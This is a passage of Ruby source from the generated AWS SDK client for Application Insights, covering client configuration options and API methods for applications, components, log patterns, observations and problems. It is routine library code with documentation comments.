# `Aws::InstanceProfileCredentails` or `Aws::ECSCredentials` to
# enable retries and extended timeouts. Instance profile credential
# fetching can be disabled by setting ENV['AWS_EC2_METADATA_DISABLED']
# to true.
#
# @option options [required, String] :region
# The AWS region to connect to. The configured `:region` is
# used to determine the service `:endpoint`. When not passed,
# a default `:region` is searched for in the following locations:
#
# * `Aws.config[:region]`
# * `ENV['AWS_REGION']`
# * `ENV['AMAZON_REGION']`
# * `ENV['AWS_DEFAULT_REGION']`
# * `~/.aws/credentials`
# * `~/.aws/config`
#
# @option options [String] :access_key_id
#
# @option options [Boolean] :active_endpoint_cache (false)
# When set to `true`, a thread polling for endpoints will be running in
# the background every 60 secs (default). Defaults to `false`.
#
# @option options [Boolean] :adaptive_retry_wait_to_fill (true)
# Used only in `adaptive` retry mode. When true, the request will sleep
# until there is sufficent client side capacity to retry the request.
# When false, the request will raise a `RetryCapacityNotAvailableError` and will
# not retry instead of sleeping.
#
# @option options [Boolean] :client_side_monitoring (false)
# When `true`, client-side metrics will be collected for all API requests from
# this client.
#
# @option options [String] :client_side_monitoring_client_id ("")
# Allows you to provide an identifier for this client which will be attached to
# all generated client side metrics. Defaults to an empty string.
#
# @option options [String] :client_side_monitoring_host ("127.0.0.1")
# Allows you to specify the DNS hostname or IPv4 or IPv6 address that the client
# side monitoring agent is running on, where client metrics will be published via UDP.
#
# @option options [Integer] :client_side_monitoring_port (31000)
# Required for publishing client metrics. The port that the client side monitoring
# agent is running on, where client metrics will be published via UDP.
#
# @option options [Aws::ClientSideMonitoring::Publisher] :client_side_monitoring_publisher (Aws::ClientSideMonitoring::Publisher)
# Allows you to provide a custom client-side monitoring publisher class. By default,
# will use the Client Side Monitoring Agent Publisher.
#
# @option options [Boolean] :convert_params (true)
# When `true`, an attempt is made to coerce request parameters into
# the required types.
#
# @option options [Boolean] :correct_clock_skew (true)
# Used only in `standard` and adaptive retry modes. Specifies whether to apply
# a clock skew correction and retry requests with skewed client clocks.
#
# @option options [String] :defaults_mode ("legacy")
# See {Aws::DefaultsModeConfiguration} for a list of the
# accepted modes and the configuration defaults that are included.
#
# @option options [Boolean] :disable_host_prefix_injection (false)
# Set to true to disable SDK automatically adding host prefix
# to default service endpoint when available.
#
# @option options [String] :endpoint
# The client endpoint is normally constructed from the `:region`
# option. You should only configure an `:endpoint` when connecting
# to test or custom endpoints. This should be a valid HTTP(S) URI.
#
# @option options [Integer] :endpoint_cache_max_entries (1000)
# Used for the maximum size limit of the LRU cache storing endpoints data
# for endpoint discovery enabled operations. Defaults to 1000.
#
# @option options [Integer] :endpoint_cache_max_threads (10)
# Used for the maximum threads in use for polling endpoints to be cached, defaults to 10.
#
# @option options [Integer] :endpoint_cache_poll_interval (60)
# When :endpoint_discovery and :active_endpoint_cache is enabled,
# Use this option to config the time interval in seconds for making
# requests fetching endpoints information. Defaults to 60 sec.
#
# @option options [Boolean] :endpoint_discovery (false)
# When set to `true`, endpoint discovery will be enabled for operations when available.
#
# @option options [Aws::Log::Formatter] :log_formatter (Aws::Log::Formatter.default)
# The log formatter.
#
# @option options [Symbol] :log_level (:info)
# The log level to send messages to the `:logger` at.
#
# @option options [Logger] :logger
# The Logger instance to send log messages to. If this option
# is not set, logging will be disabled.
#
# @option options [Integer] :max_attempts (3)
# An integer representing the maximum number attempts that will be made for
# a single request, including the initial attempt. For example,
# setting this value to 5 will result in a request being retried up to
# 4 times. Used in `standard` and `adaptive` retry modes.
#
# @option options [String] :profile ("default")
# Used when loading credentials from the shared credentials file
# at HOME/.aws/credentials. When not specified, 'default' is used.
#
# @option options [Proc] :retry_backoff
# A proc or lambda used for backoff. Defaults to 2**retries * retry_base_delay.
# This option is only used in the `legacy` retry mode.
#
# @option options [Float] :retry_base_delay (0.3)
# The base delay in seconds used by the default backoff function. This option
# is only used in the `legacy` retry mode.
#
# @option options [Symbol] :retry_jitter (:none)
# A delay randomiser function used by the default backoff function.
# Some predefined functions can be referenced by name - :none, :equal, :full,
# otherwise a Proc that takes and returns a number. This option is only used
# in the `legacy` retry mode.
#
# @see https://www.awsarchitectureblog.com/2015/03/backoff.html
#
# @option options [Integer] :retry_limit (3)
# The maximum number of times to retry failed requests. Only
# ~ 500 level server errors and certain ~ 400 level client errors
# are retried. Generally, these are throttling errors, data
# checksum errors, networking errors, timeout errors, auth errors,
# endpoint discovery, and errors from expired credentials.
# This option is only used in the `legacy` retry mode.
#
# @option options [Integer] :retry_max_delay (0)
# The maximum number of seconds to delay between retries (0 for no limit)
# used by the default backoff function. This option is only used in the
# `legacy` retry mode.
#
# @option options [String] :retry_mode ("legacy")
# Specifies which retry algorithm to use. Values are:
#
# * `legacy` - The pre-existing retry behavior. This is default value if
# no retry mode is provided.
#
# * `standard` - A standardized set of retry rules across the AWS SDKs.
# This includes support for retry quotas, which limit the number of
# unsuccessful retries a client can make.
#
# * `adaptive` - An experimental retry mode that includes all the
# functionality of `standard` mode along with automatic client side
# throttling. This is a provisional mode that may change behavior
# in the future.
#
#
# @option options [String] :secret_access_key
#
# @option options [String] :session_token
#
# @option options [Boolean] :simple_json (false)
# Disables request parameter conversion, validation, and formatting.
# Also disable response data type conversions. This option is useful
# when you want to ensure the highest level of performance by
# avoiding overhead of walking request parameters and response data
# structures.
#
# When `:simple_json` is enabled, the request parameters hash must
# be formatted exactly as the DynamoDB API expects.
#
# @option options [Boolean] :stub_responses (false)
# Causes the client to return stubbed responses. By default
# fake responses are generated and returned. You can specify
# the response data to return or errors to raise by calling
# {ClientStubs#stub_responses}. See {ClientStubs} for more information.
#
# ** Please note ** When response stubbing is enabled, no HTTP
# requests are made, and retries are disabled.
#
# @option options [Boolean] :use_dualstack_endpoint
# When set to `true`, dualstack enabled endpoints (with `.aws` TLD)
# will be used if available.
#
# @option options [Boolean] :use_fips_endpoint
# When set to `true`, fips compatible endpoints will be used if available.
# When a `fips` region is used, the region is normalized and this config
# is set to `true`.
#
# @option options [Boolean] :validate_params (true)
# When `true`, request parameters are validated before
# sending the request.
#
# @option options [URI::HTTP,String] :http_proxy A proxy to send
# requests through. Formatted like 'http://proxy.com:123'.
#
# @option options [Float] :http_open_timeout (15) The number of
# seconds to wait when opening a HTTP session before raising a
# `Timeout::Error`.
#
# @option options [Float] :http_read_timeout (60) The default
# number of seconds to wait for response data. This value can
# safely be set per-request on the session.
#
# @option options [Float] :http_idle_timeout (5) The number of
# seconds a connection is allowed to sit idle before it is
# considered stale. Stale connections are closed and removed
# from the pool before making a request.
#
# @option options [Float] :http_continue_timeout (1) The number of
# seconds to wait for a 100-continue response before sending the
# request body. This option has no effect unless the request has
# "Expect" header set to "100-continue". Defaults to `nil` which
# disables this behaviour. This value can safely be set per
# request on the session.
#
# @option options [Float] :ssl_timeout (nil) Sets the SSL timeout
# in seconds.
#
# @option options [Boolean] :http_wire_trace (false) When `true`,
# HTTP debug output will be sent to the `:logger`.
#
# @option options [Boolean] :ssl_verify_peer (true) When `true`,
# SSL peer certificates are verified when establishing a
# connection.
#
# @option options [String] :ssl_ca_bundle Full path to the SSL
# certificate authority bundle file that should be used when
# verifying peer certificates. If you do not pass
# `:ssl_ca_bundle` or `:ssl_ca_directory` the the system default
# will be used if available.
#
# @option options [String] :ssl_ca_directory Full path of the
# directory that contains the unbundled SSL certificate
# authority files for verifying peer certificates. If you do
# not pass `:ssl_ca_bundle` or `:ssl_ca_directory` the the
# system default will be used if available.
#
def initialize(*args)
super
end
# @!group API Operations
# Adds an application that is created from a resource group.
#
# @option params [String] :resource_group_name
# The name of the resource group.
#
# @option params [Boolean] :ops_center_enabled
# When set to `true`, creates opsItems for any problems detected on an
# application.
#
# @option params [Boolean] :cwe_monitor_enabled
# Indicates whether Application Insights can listen to CloudWatch events
# for the application resources, such as `instance terminated`, `failed
# deployment`, and others.
#
# @option params [String] :ops_item_sns_topic_arn
# The SNS topic provided to Application Insights that is associated to
# the created opsItem. Allows you to receive notifications for updates
# to the opsItem.
#
# @option params [Array<Types::Tag>] :tags
# List of tags to add to the application. tag key (`Key`) and an
# associated tag value (`Value`). The maximum length of a tag key is 128
# characters. The maximum length of a tag value is 256 characters.
#
# @option params [Boolean] :auto_config_enabled
#
# @option params [Boolean] :auto_create
#
# @return [Types::CreateApplicationResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::CreateApplicationResponse#application_info #application_info} => Types::ApplicationInfo
#
# @example Request syntax with placeholder values
#
# resp = client.create_application({
# resource_group_name: "ResourceGroupName",
# ops_center_enabled: false,
# cwe_monitor_enabled: false,
# ops_item_sns_topic_arn: "OpsItemSNSTopicArn",
# tags: [
# {
# key: "TagKey", # required
# value: "TagValue", # required
# },
# ],
# auto_config_enabled: false,
# auto_create: false,
# })
#
# @example Response structure
#
# resp.application_info.resource_group_name #=> String
# resp.application_info.life_cycle #=> String
# resp.application_info.ops_item_sns_topic_arn #=> String
# resp.application_info.ops_center_enabled #=> Boolean
# resp.application_info.cwe_monitor_enabled #=> Boolean
# resp.application_info.remarks #=> String
# resp.application_info.auto_config_enabled #=> Boolean
# resp.application_info.discovery_type #=> String, one of "RESOURCE_GROUP_BASED", "ACCOUNT_BASED"
#
# @see http://docs.aws.amazon.com/goto/WebAPI/application-insights-2018-11-25/CreateApplication AWS API Documentation
#
# @overload create_application(params = {})
# @param [Hash] params ({})
def create_application(params = {}, options = {})
req = build_request(:create_application, params)
req.send_request(options)
end
# Creates a custom component by grouping similar standalone instances to
# monitor.
#
# @option params [required, String] :resource_group_name
# The name of the resource group.
#
# @option params [required, String] :component_name
# The name of the component.
#
# @option params [required, Array<String>] :resource_list
# The list of resource ARNs that belong to the component.
#
# @return [Struct] Returns an empty {Seahorse::Client::Response response}.
#
# @example Request syntax with placeholder values
#
# resp = client.create_component({
# resource_group_name: "ResourceGroupName", # required
# component_name: "CustomComponentName", # required
# resource_list: ["ResourceARN"], # required
# })
#
# @see http://docs.aws.amazon.com/goto/WebAPI/application-insights-2018-11-25/CreateComponent AWS API Documentation
#
# @overload create_component(params = {})
# @param [Hash] params ({})
def create_component(params = {}, options = {})
req = build_request(:create_component, params)
req.send_request(options)
end
# Adds an log pattern to a `LogPatternSet`.
#
# @option params [required, String] :resource_group_name
# The name of the resource group.
#
# @option params [required, String] :pattern_set_name
# The name of the log pattern set.
#
# @option params [required, String] :pattern_name
# The name of the log pattern.
#
# @option params [required, String] :pattern
# The log pattern. The pattern must be DFA compatible. Patterns that
# utilize forward lookahead or backreference constructions are not
# supported.
#
# @option params [required, Integer] :rank
# Rank of the log pattern. Must be a value between `1` and `1,000,000`.
# The patterns are sorted by rank, so we recommend that you set your
# highest priority patterns with the lowest rank. A pattern of rank `1`
# will be the first to get matched to a log line. A pattern of rank
# `1,000,000` will be last to get matched. When you configure custom log
# patterns from the console, a `Low` severity pattern translates to a
# `750,000` rank. A `Medium` severity pattern translates to a `500,000`
# rank. And a `High` severity pattern translates to a `250,000` rank.
# Rank values less than `1` or greater than `1,000,000` are reserved for
# AWS-provided patterns.
#
# @return [Types::CreateLogPatternResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::CreateLogPatternResponse#log_pattern #log_pattern} => Types::LogPattern
# * {Types::CreateLogPatternResponse#resource_group_name #resource_group_name} => String
#
# @example Request syntax with placeholder values
#
# resp = client.create_log_pattern({
# resource_group_name: "ResourceGroupName", # required
# pattern_set_name: "LogPatternSetName", # required
# pattern_name: "LogPatternName", # required
# pattern: "LogPatternRegex", # required
# rank: 1, # required
# })
#
# @example Response structure
#
# resp.log_pattern.pattern_set_name #=> String
# resp.log_pattern.pattern_name #=> String
# resp.log_pattern.pattern #=> String
# resp.log_pattern.rank #=> Integer
# resp.resource_group_name #=> String
#
# @see http://docs.aws.amazon.com/goto/WebAPI/application-insights-2018-11-25/CreateLogPattern AWS API Documentation
#
# @overload create_log_pattern(params = {})
# @param [Hash] params ({})
def create_log_pattern(params = {}, options = {})
req = build_request(:create_log_pattern, params)
req.send_request(options)
end
# Removes the specified application from monitoring. Does not delete the
# application.
#
# @option params [required, String] :resource_group_name
# The name of the resource group.
#
# @return [Struct] Returns an empty {Seahorse::Client::Response response}.
#
# @example Request syntax with placeholder values
#
# resp = client.delete_application({
# resource_group_name: "ResourceGroupName", # required
# })
#
# @see http://docs.aws.amazon.com/goto/WebAPI/application-insights-2018-11-25/DeleteApplication AWS API Documentation
#
# @overload delete_application(params = {})
# @param [Hash] params ({})
def delete_application(params = {}, options = {})
req = build_request(:delete_application, params)
req.send_request(options)
end
# Ungroups a custom component. When you ungroup custom components, all
# applicable monitors that are set up for the component are removed and
# the instances revert to their standalone status.
#
# @option params [required, String] :resource_group_name
# The name of the resource group.
#
# @option params [required, String] :component_name
# The name of the component.
#
# @return [Struct] Returns an empty {Seahorse::Client::Response response}.
#
# @example Request syntax with placeholder values
#
# resp = client.delete_component({
# resource_group_name: "ResourceGroupName", # required
# component_name: "CustomComponentName", # required
# })
#
# @see http://docs.aws.amazon.com/goto/WebAPI/application-insights-2018-11-25/DeleteComponent AWS API Documentation
#
# @overload delete_component(params = {})
# @param [Hash] params ({})
def delete_component(params = {}, options = {})
req = build_request(:delete_component, params)
req.send_request(options)
end
# Removes the specified log pattern from a `LogPatternSet`.
#
# @option params [required, String] :resource_group_name
# The name of the resource group.
#
# @option params [required, String] :pattern_set_name
# The name of the log pattern set.
#
# @option params [required, String] :pattern_name
# The name of the log pattern.
#
# @return [Struct] Returns an empty {Seahorse::Client::Response response}.
#
# @example Request syntax with placeholder values
#
# resp = client.delete_log_pattern({
# resource_group_name: "ResourceGroupName", # required
# pattern_set_name: "LogPatternSetName", # required
# pattern_name: "LogPatternName", # required
# })
#
# @see http://docs.aws.amazon.com/goto/WebAPI/application-insights-2018-11-25/DeleteLogPattern AWS API Documentation
#
# @overload delete_log_pattern(params = {})
# @param [Hash] params ({})
def delete_log_pattern(params = {}, options = {})
req = build_request(:delete_log_pattern, params)
req.send_request(options)
end
# Describes the application.
#
# @option params [required, String] :resource_group_name
# The name of the resource group.
#
# @return [Types::DescribeApplicationResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::DescribeApplicationResponse#application_info #application_info} => Types::ApplicationInfo
#
# @example Request syntax with placeholder values
#
# resp = client.describe_application({
# resource_group_name: "ResourceGroupName", # required
# })
#
# @example Response structure
#
# resp.application_info.resource_group_name #=> String
# resp.application_info.life_cycle #=> String
# resp.application_info.ops_item_sns_topic_arn #=> String
# resp.application_info.ops_center_enabled #=> Boolean
# resp.application_info.cwe_monitor_enabled #=> Boolean
# resp.application_info.remarks #=> String
# resp.application_info.auto_config_enabled #=> Boolean
# resp.application_info.discovery_type #=> String, one of "RESOURCE_GROUP_BASED", "ACCOUNT_BASED"
#
# @see http://docs.aws.amazon.com/goto/WebAPI/application-insights-2018-11-25/DescribeApplication AWS API Documentation
#
# @overload describe_application(params = {})
# @param [Hash] params ({})
def describe_application(params = {}, options = {})
req = build_request(:describe_application, params)
req.send_request(options)
end
# Describes a component and lists the resources that are grouped
# together in a component.
#
# @option params [required, String] :resource_group_name
# The name of the resource group.
#
# @option params [required, String] :component_name
# The name of the component.
#
# @return [Types::DescribeComponentResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::DescribeComponentResponse#application_component #application_component} => Types::ApplicationComponent
# * {Types::DescribeComponentResponse#resource_list #resource_list} => Array<String>
#
# @example Request syntax with placeholder values
#
# resp = client.describe_component({
# resource_group_name: "ResourceGroupName", # required
# component_name: "ComponentName", # required
# })
#
# @example Response structure
#
# resp.application_component.component_name #=> String
# resp.application_component.component_remarks #=> String
# resp.application_component.resource_type #=> String
# resp.application_component.os_type #=> String, one of "WINDOWS", "LINUX"
# resp.application_component.tier #=> String, one of "CUSTOM", "DEFAULT", "DOT_NET_CORE", "DOT_NET_WORKER", "DOT_NET_WEB_TIER", "DOT_NET_WEB", "SQL_SERVER", "SQL_SERVER_ALWAYSON_AVAILABILITY_GROUP", "MYSQL", "POSTGRESQL", "JAVA_JMX", "ORACLE", "SAP_HANA_MULTI_NODE", "SAP_HANA_SINGLE_NODE", "SAP_HANA_HIGH_AVAILABILITY", "SQL_SERVER_FAILOVER_CLUSTER_INSTANCE", "SHAREPOINT", "ACTIVE_DIRECTORY"
# resp.application_component.monitor #=> Boolean
# resp.application_component.detected_workload #=> Hash
# resp.application_component.detected_workload["Tier"] #=> Hash
# resp.application_component.detected_workload["Tier"]["MetaDataKey"] #=> String
# resp.resource_list #=> Array
# resp.resource_list[0] #=> String
#
# @see http://docs.aws.amazon.com/goto/WebAPI/application-insights-2018-11-25/DescribeComponent AWS API Documentation
#
# @overload describe_component(params = {})
# @param [Hash] params ({})
def describe_component(params = {}, options = {})
req = build_request(:describe_component, params)
req.send_request(options)
end
# Describes the monitoring configuration of the component.
#
# @option params [required, String] :resource_group_name
# The name of the resource group.
#
# @option params [required, String] :component_name
# The name of the component.
#
# @return [Types::DescribeComponentConfigurationResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::DescribeComponentConfigurationResponse#monitor #monitor} => Boolean
# * {Types::DescribeComponentConfigurationResponse#tier #tier} => String
# * {Types::DescribeComponentConfigurationResponse#component_configuration #component_configuration} => String
#
# @example Request syntax with placeholder values
#
# resp = client.describe_component_configuration({
# resource_group_name: "ResourceGroupName", # required
# component_name: "ComponentName", # required
# })
#
# @example Response structure
#
# resp.monitor #=> Boolean
# resp.tier #=> String, one of "CUSTOM", "DEFAULT", "DOT_NET_CORE", "DOT_NET_WORKER", "DOT_NET_WEB_TIER", "DOT_NET_WEB", "SQL_SERVER", "SQL_SERVER_ALWAYSON_AVAILABILITY_GROUP", "MYSQL", "POSTGRESQL", "JAVA_JMX", "ORACLE", "SAP_HANA_MULTI_NODE", "SAP_HANA_SINGLE_NODE", "SAP_HANA_HIGH_AVAILABILITY", "SQL_SERVER_FAILOVER_CLUSTER_INSTANCE", "SHAREPOINT", "ACTIVE_DIRECTORY"
# resp.component_configuration #=> String
#
# @see http://docs.aws.amazon.com/goto/WebAPI/application-insights-2018-11-25/DescribeComponentConfiguration AWS API Documentation
#
# @overload describe_component_configuration(params = {})
# @param [Hash] params ({})
def describe_component_configuration(params = {}, options = {})
req = build_request(:describe_component_configuration, params)
req.send_request(options)
end
# Describes the recommended monitoring configuration of the component.
#
# @option params [required, String] :resource_group_name
# The name of the resource group.
#
# @option params [required, String] :component_name
# The name of the component.
#
# @option params [required, String] :tier
# The tier of the application component. Supported tiers include
# `DOT_NET_CORE`, `DOT_NET_WORKER`, `DOT_NET_WEB`, `SQL_SERVER`, and
# `DEFAULT`.
#
# @return [Types::DescribeComponentConfigurationRecommendationResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::DescribeComponentConfigurationRecommendationResponse#component_configuration #component_configuration} => String
#
# @example Request syntax with placeholder values
#
# resp = client.describe_component_configuration_recommendation({
# resource_group_name: "ResourceGroupName", # required
# component_name: "ComponentName", # required
# tier: "CUSTOM", # required, accepts CUSTOM, DEFAULT, DOT_NET_CORE, DOT_NET_WORKER, DOT_NET_WEB_TIER, DOT_NET_WEB, SQL_SERVER, SQL_SERVER_ALWAYSON_AVAILABILITY_GROUP, MYSQL, POSTGRESQL, JAVA_JMX, ORACLE, SAP_HANA_MULTI_NODE, SAP_HANA_SINGLE_NODE, SAP_HANA_HIGH_AVAILABILITY, SQL_SERVER_FAILOVER_CLUSTER_INSTANCE, SHAREPOINT, ACTIVE_DIRECTORY
# })
#
# @example Response structure
#
# resp.component_configuration #=> String
#
# @see http://docs.aws.amazon.com/goto/WebAPI/application-insights-2018-11-25/DescribeComponentConfigurationRecommendation AWS API Documentation
#
# @overload describe_component_configuration_recommendation(params = {})
# @param [Hash] params ({})
def describe_component_configuration_recommendation(params = {}, options = {})
req = build_request(:describe_component_configuration_recommendation, params)
req.send_request(options)
end
# Describe a specific log pattern from a `LogPatternSet`.
#
# @option params [required, String] :resource_group_name
# The name of the resource group.
#
# @option params [required, String] :pattern_set_name
# The name of the log pattern set.
#
# @option params [required, String] :pattern_name
# The name of the log pattern.
#
# @return [Types::DescribeLogPatternResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::DescribeLogPatternResponse#resource_group_name #resource_group_name} => String
# * {Types::DescribeLogPatternResponse#log_pattern #log_pattern} => Types::LogPattern
#
# @example Request syntax with placeholder values
#
# resp = client.describe_log_pattern({
# resource_group_name: "ResourceGroupName", # required
# pattern_set_name: "LogPatternSetName", # required
# pattern_name: "LogPatternName", # required
# })
#
# @example Response structure
#
# resp.resource_group_name #=> String
# resp.log_pattern.pattern_set_name #=> String
# resp.log_pattern.pattern_name #=> String
# resp.log_pattern.pattern #=> String
# resp.log_pattern.rank #=> Integer
#
# @see http://docs.aws.amazon.com/goto/WebAPI/application-insights-2018-11-25/DescribeLogPattern AWS API Documentation
#
# @overload describe_log_pattern(params = {})
# @param [Hash] params ({})
def describe_log_pattern(params = {}, options = {})
req = build_request(:describe_log_pattern, params)
req.send_request(options)
end
# Describes an anomaly or error with the application.
#
# @option params [required, String] :observation_id
# The ID of the observation.
#
# @return [Types::DescribeObservationResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::DescribeObservationResponse#observation #observation} => Types::Observation
#
# @example Request syntax with placeholder values
#
# resp = client.describe_observation({
# observation_id: "ObservationId", # required
# })
#
# @example Response structure
#
# resp.observation.id #=> String
# resp.observation.start_time #=> Time
# resp.observation.end_time #=> Time
# resp.observation.source_type #=> String
# resp.observation.source_arn #=> String
# resp.observation.log_group #=> String
# resp.observation.line_time #=> Time
# resp.observation.log_text #=> String
# resp.observation.log_filter #=> String, one of "ERROR", "WARN", "INFO"
# resp.observation.metric_namespace #=> String
# resp.observation.metric_name #=> String
# resp.observation.unit #=> String
# resp.observation.value #=> Float
# resp.observation.cloud_watch_event_id #=> String
# resp.observation.cloud_watch_event_source #=> String, one of "EC2", "CODE_DEPLOY", "HEALTH", "RDS"
# resp.observation.cloud_watch_event_detail_type #=> String
# resp.observation.health_event_arn #=> String
# resp.observation.health_service #=> String
# resp.observation.health_event_type_code #=> String
# resp.observation.health_event_type_category #=> String
# resp.observation.health_event_description #=> String
# resp.observation.code_deploy_deployment_id #=> String
# resp.observation.code_deploy_deployment_group #=> String
# resp.observation.code_deploy_state #=> String
# resp.observation.code_deploy_application #=> String
# resp.observation.code_deploy_instance_group_id #=> String
# resp.observation.ec2_state #=> String
# resp.observation.rds_event_categories #=> String
# resp.observation.rds_event_message #=> String
# resp.observation.s3_event_name #=> String
# resp.observation.states_execution_arn #=> String
# resp.observation.states_arn #=> String
# resp.observation.states_status #=> String
# resp.observation.states_input #=> String
# resp.observation.ebs_event #=> String
# resp.observation.ebs_result #=> String
# resp.observation.ebs_cause #=> String
# resp.observation.ebs_request_id #=> String
# resp.observation.x_ray_fault_percent #=> Integer
# resp.observation.x_ray_throttle_percent #=> Integer
# resp.observation.x_ray_error_percent #=> Integer
# resp.observation.x_ray_request_count #=> Integer
# resp.observation.x_ray_request_average_latency #=> Integer
# resp.observation.x_ray_node_name #=> String
# resp.observation.x_ray_node_type #=> String
#
# @see http://docs.aws.amazon.com/goto/WebAPI/application-insights-2018-11-25/DescribeObservation AWS API Documentation
#
# @overload describe_observation(params = {})
# @param [Hash] params ({})
def describe_observation(params = {}, options = {})
req = build_request(:describe_observation, params)
req.send_request(options)
end
# Describes an application problem.
#
# @option params [required, String] :problem_id
# The ID of the problem.
#
# @return [Types::DescribeProblemResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::DescribeProblemResponse#problem #problem} => Types::Problem
#
# @example Request syntax with placeholder values
#
# resp = client.describe_problem({
# problem_id: "ProblemId", # required
# })
#
# @example Response structure
#
# resp.problem.id #=> String
# resp.problem.title #=> String
# resp.problem.insights #=> String
# resp.problem.status #=> String, one of "IGNORE", "RESOLVED", "PENDING", "RECURRING"
# resp.problem.affected_resource #=> String
# resp.problem.start_time #=> Time
# resp.problem.end_time #=> Time
# resp.problem.severity_level #=> String, one of "Low", "Medium", "High"
# resp.problem.resource_group_name #=> String
# resp.problem.feedback #=> Hash
# resp.problem.feedback["FeedbackKey"] #=> String, one of "NOT_SPECIFIED", "USEFUL", "NOT_USEFUL"
# resp.problem.recurring_count #=> Integer
# resp.problem.last_recurrence_time #=> Time
#
# @see http://docs.aws.amazon.com/goto/WebAPI/application-insights-2018-11-25/DescribeProblem AWS API Documentation
#
# @overload describe_problem(params = {})
# @param [Hash] params ({})
def describe_problem(params = {}, options = {})
req = build_request(:describe_problem, params)
req.send_request(options)
end
# Describes the anomalies or errors associated with the problem.
#
# @option params [required, String] :problem_id
# The ID of the problem.
#
# @return [Types::DescribeProblemObservationsResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::DescribeProblemObservationsResponse#related_observations #related_observations} => Types::RelatedObservations
#
# @example Request syntax with placeholder values
#
# resp = client.describe_problem_observations({
# problem_id: "ProblemId", # required
# })
#
# @example Response structure
#
# resp.related_observations.observation_list #=> Array
# resp.related_observations.observation_list[0].id #=> String
# resp.related_observations.observation_list[0].start_time #=> Time
# resp.related_observations.observation_list[0].end_time #=> Time
# resp.related_observations.observation_list[0].source_type #=> String
# resp.related_observations.observation_list[0].source_arn #=> String
# resp.related_observations.observation_list[0].log_group #=> String
# resp.related_observations.observation_list[0].line_time #=> Time
# resp.related_observations.observation_list[0].log_text #=> String
# resp.related_observations.observation_list[0].log_filter #=> String, one of "ERROR", "WARN", "INFO"
# resp.related_observations.observation_list[0].metric_namespace #=> String
# resp.related_observations.observation_list[0].metric_name #=> String
# resp.related_observations.observation_list[0].unit #=> String
# resp.related_observations.observation_list[0].value #=> Float
# resp.related_observations.observation_list[0].cloud_watch_event_id #=> String
# resp.related_observations.observation_list[0].cloud_watch_event_source #=> String, one of "EC2", "CODE_DEPLOY", "HEALTH", "RDS"
# resp.related_observations.observation_list[0].cloud_watch_event_detail_type #=> String
# resp.related_observations.observation_list[0].health_event_arn #=> String
# resp.related_observations.observation_list[0].health_service #=> String
# resp.related_observations.observation_list[0].health_event_type_code #=> String
# resp.related_observations.observation_list[0].health_event_type_category #=> String
# resp.related_observations.observation_list[0].health_event_description #=> String
# resp.related_observations.observation_list[0].code_deploy_deployment_id #=> String
# resp.related_observations.observation_list[0].code_deploy_deployment_group #=> String
# resp.related_observations.observation_list[0].code_deploy_state #=> String
# resp.related_observations.observation_list[0].code_deploy_application #=> String
# resp.related_observations.observation_list[0].code_deploy_instance_group_id #=> String
# resp.related_observations.observation_list[0].ec2_state #=> String
# resp.related_observations.observation_list[0].rds_event_categories #=> String
# resp.related_observations.observation_list[0].rds_event_message #=> String
# resp.related_observations.observation_list[0].s3_event_name #=> String
# resp.related_observations.observation_list[0].states_execution_arn #=> String
# resp.related_observations.observation_list[0].states_arn #=> String
# resp.related_observations.observation_list[0].states_status #=> String
# resp.related_observations.observation_list[0].states_input #=> String
# resp.related_observations.observation_list[0].ebs_event #=> String
# resp.related_observations.observation_list[0].ebs_result #=> String
# resp.related_observations.observation_list[0].ebs_cause #=> String
# resp.related_observations.observation_list[0].ebs_request_id #=> String
# resp.related_observations.observation_list[0].x_ray_fault_percent #=> Integer
# resp.related_observations.observation_list[0].x_ray_throttle_percent #=> Integer
# resp.related_observations.observation_list[0].x_ray_error_percent #=> Integer
# resp.related_observations.observation_list[0].x_ray_request_count #=> Integer
# resp.related_observations.observation_list[0].x_ray_request_average_latency #=> Integer
# resp.related_observations.observation_list[0].x_ray_node_name #=> String
# resp.related_observations.observation_list[0].x_ray_node_type #=> String
#
# @see http://docs.aws.amazon.com/goto/WebAPI/application-insights-2018-11-25/DescribeProblemObservations AWS API Documentation
#
# @overload describe_problem_observations(params = {})
# @param [Hash] params ({})
def describe_problem_observations(params = {}, options = {})
req = build_request(:describe_problem_observations, params)
req.send_request(options)
end
# Lists the IDs of the applications that you are monitoring.
#
# @option params [Integer] :max_results
# The maximum number of results to return in a single call. To retrieve
# the remaining results, make another call with the returned `NextToken`
# value.
#
# @option params [String] :next_token
# The token to request the next page of results.
#
# @return [Types::ListApplicationsResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::ListApplicationsResponse#application_info_list #application_info_list} => Array<Types::ApplicationInfo>
# * {Types::ListApplicationsResponse#next_token #next_token} => String
#
# The returned {Seahorse::Client::Response response} is a pageable response and is Enumerable. For details on usage see {Aws::PageableResponse PageableResponse}.
#
# @example Request syntax with placeholder values
#
# resp = client.list_applications({
# max_results: 1,
# next_token: "PaginationToken",
# })
#
# @example Response structure
#
# resp.application_info_list #=> Array
# resp.application_info_list[0].resource_group_name #=> String
# resp.application_info_list[0].life_cycle #=> String
# resp.application_info_list[0].ops_item_sns_topic_arn #=> String
# resp.application_info_list[0].ops_center_enabled #=> Boolean
# resp.application_info_list[0].cwe_monitor_enabled #=> Boolean
# resp.application_info_list[0].remarks #=> String
# resp.application_info_list[0].auto_config_enabled #=> Boolean
# resp.application_info_list[0].discovery_type #=> String, one of "RESOURCE_GROUP_BASED", "ACCOUNT_BASED"
# resp.next_token #=> String
#
# @see http://docs.aws.amazon.com/goto/WebAPI/application-insights-2018-11-25/ListApplications AWS API Documentation
#
# @overload list_applications(params = {})
# @param [Hash] params ({})
def list_applications(params = {}, options = {})
req = build_request(:list_applications, params)
req.send_request(options)
end
# Lists the auto-grouped, standalone, and custom components of the
# application.
#
# @option params [required, String] :resource_group_name
# The name of the resource group.
#
# @option params [Integer] :max_results
# The maximum number of results to return in a single call. To retrieve
# the remaining results, make another call with the returned `NextToken`
# value.
#
# @option params [String] :next_token
# The token to request the next page of results.
#
